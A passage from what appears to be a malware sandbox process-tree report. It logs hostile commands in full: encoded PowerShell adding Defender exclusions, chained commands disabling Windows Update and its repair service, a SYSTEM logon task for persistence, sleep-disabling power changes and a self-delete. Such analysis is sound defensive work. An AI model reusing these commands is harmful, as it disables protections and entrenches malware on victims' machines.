        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        8⤵
        
        PID:2800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        9⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3012
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        8⤵
        
        PID:2020
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        9⤵
        Launches sc.exe
        
        PID:1088
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        9⤵
        Launches sc.exe
        
        PID:444
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        9⤵
        Launches sc.exe
        
        PID:2024
        
        C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        9⤵
        Launches sc.exe
        
        PID:2028
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        9⤵
        Launches sc.exe
        
        PID:576
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        9⤵
        Launches sc.exe
        
        PID:496
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:1032
        
        C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        9⤵
        Launches sc.exe
        
        PID:2088
        
        C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:1640
        
        C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        9⤵
        Launches sc.exe
        
        PID:2752
        
        C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:2692
        
        C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        9⤵
        Launches sc.exe
        
        PID:2108
        
        C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:2756
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        9⤵
        Launches sc.exe
        
        PID:944
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:1008
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1764
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1356
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        9⤵
        
        PID:2156
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        9⤵
        
        PID:2288
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        9⤵
        
        PID:2092
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        9⤵
        
        PID:2340
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        9⤵
        
        PID:664
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        9⤵
        
        PID:1432
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        9⤵
        
        PID:2216
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        9⤵
        
        PID:2704
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        9⤵
        
        PID:2712
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        9⤵
        
        PID:2956
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        9⤵
        
        PID:2496
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        9⤵
        
        PID:844
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        9⤵
        
        PID:2820
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        8⤵
        Power Settings
        
        PID:1652
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        9⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1036
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        9⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:768
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        9⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2604
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        9⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1684
        
        C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        8⤵
        
        PID:2232
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "sjrcqeodaodte"
        9⤵
        
        PID:784
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        
        PID:2000
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:2444
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2052
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    C:\Users\Admin\AppData\Local\Temp\svchost.exe
    3⤵
    - Executes dropped EXE
    PID:2816
  - - C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      4⤵
      Drops file in Drivers directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2868
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        5⤵
        
        PID:2716
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        6⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2376
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        5⤵
        
        PID:832
      - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:628
      - C:\Windows\system32\sc.exe
        
        sc stop bits
        6⤵
        Launches sc.exe
        
        PID:1772
      - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        6⤵
        Launches sc.exe
        
        PID:1728
      - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:864
      - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:1168
      - C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        6⤵
        Launches sc.exe
        
        PID:3060
      - C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:2288
      - C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        6⤵
        Launches sc.exe
        
        PID:2112
      - C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:2512
      - C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        6⤵
        Launches sc.exe
        
        PID:2616
      - C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:112
      - C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        6⤵
        Launches sc.exe
        
        PID:1152
      - C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:2344
      - C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        6⤵
        Launches sc.exe
        
        PID:1992
      - C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        6⤵
        Launches sc.exe
        
        PID:2620
      - C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2888
      - C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2024
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        6⤵
        
        PID:1496
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        6⤵
        
        PID:2028
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        6⤵
        
        PID:1036
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        6⤵
        
        PID:1808
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        6⤵
        
        PID:768
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        6⤵
        
        PID:2816
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        6⤵
        
        PID:2588
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        6⤵
        
        PID:1528
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        6⤵
        
        PID:2604
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        6⤵
        
        PID:2264
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        6⤵
        
        PID:1684
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        6⤵
        
        PID:2088
      - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        6⤵
        
        PID:2964
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        5⤵
        Power Settings
        
        PID:2812
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2104
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2132
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1748
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2736
    - - C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        5⤵
        Drops file in Windows directory
        
        PID:784
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        5⤵
        
        PID:2436
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:604
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"
        5⤵
        
        PID:1796
      - C:\Users\Admin\Chrome\updater.exe
        
        C:\Users\Admin\Chrome\updater.exe
        6⤵
        Executes dropped EXE
        
        PID:1352
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"
        7⤵
        Drops file in Drivers directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1632
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        8⤵
        
        PID:1624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        9⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2912
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        8⤵
        
        PID:928
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        9⤵
        Launches sc.exe
        
        PID:2832
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        9⤵
        Launches sc.exe
        
        PID:2768
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        9⤵
        Launches sc.exe
        
        PID:112
        
        C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        9⤵
        Launches sc.exe
        
        PID:860
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        9⤵
        Launches sc.exe
        
        PID:2676
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        9⤵
        Launches sc.exe
        
        PID:1784
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:1004
        
        C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        9⤵
        Launches sc.exe
        
        PID:2816
        
        C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:2264
        
        C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        9⤵
        Launches sc.exe
        
        PID:1736
        
        C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:1840
        
        C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        9⤵
        Launches sc.exe
        
        PID:2600
        
        C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:2780
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        9⤵
        Launches sc.exe
        
        PID:2532
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:1524
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1948
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2716
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        9⤵
        
        PID:3008
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        9⤵
        
        PID:1508
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        9⤵
        
        PID:2016
        
        C:\Windows\system32\reg.exe
        
